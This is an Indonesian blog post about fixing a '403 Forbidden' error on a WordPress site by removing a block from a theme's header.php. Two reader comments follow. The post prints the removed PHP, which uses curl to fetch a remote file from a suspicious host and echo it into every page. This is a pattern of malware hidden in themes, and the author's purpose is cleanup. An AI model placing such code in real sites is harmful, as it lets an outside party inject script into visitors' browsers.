Home > Pemrograman, Seputar Komputer > 403 Forbidden, Request for bidden by administrative rules

403 Forbidden, Request for bidden by administrative rules

Mungkin diantara sobat suryotech pernah ada yang menemukan sebuah website yang error dengan pesan “403 Forbidden, Request for bidden by administrative rules” seperti gambar di atas. Pesan tersebut memang muncul dari themes yang digunakan, saya menggunakan thema dari Elegant..

Pesan itu tidak muncul saat ditampilkan di localhost, tapi begitu diupload ke server akan tampil errornya… -(:  Setelah ditelusuri, ternyata ada script yang “menurut saya” perlu disingkirkan, yaitu di file header.php.

yaitu :

<?php wp_head(); ?>

<?php
if(function_exists(‘curl_init’))
{
$url = “http://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js&#8221;;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>
</head>

diubah menjadi :

<?php wp_head(); ?>
</head>

hasilnya seperti terlihat di website KiosBarcode.com

Demikian sedikit trik buat para sobat, semoga bermanfaat

  1. November 14, 2012 at 18:19

    Dulu saya juga pernah Gan seperti itu pada salah satu web saya____kerna gak tau script mana yg harus d hapus jd saya ganti Themes ___maklum masih Newbi

  2. November 15, 2012 at 08:30

    iya gan, memang itu tergantung pada themes yang digunakan… saya pakai buatan templatic..

  1. No trackbacks yet.

Leave a Reply

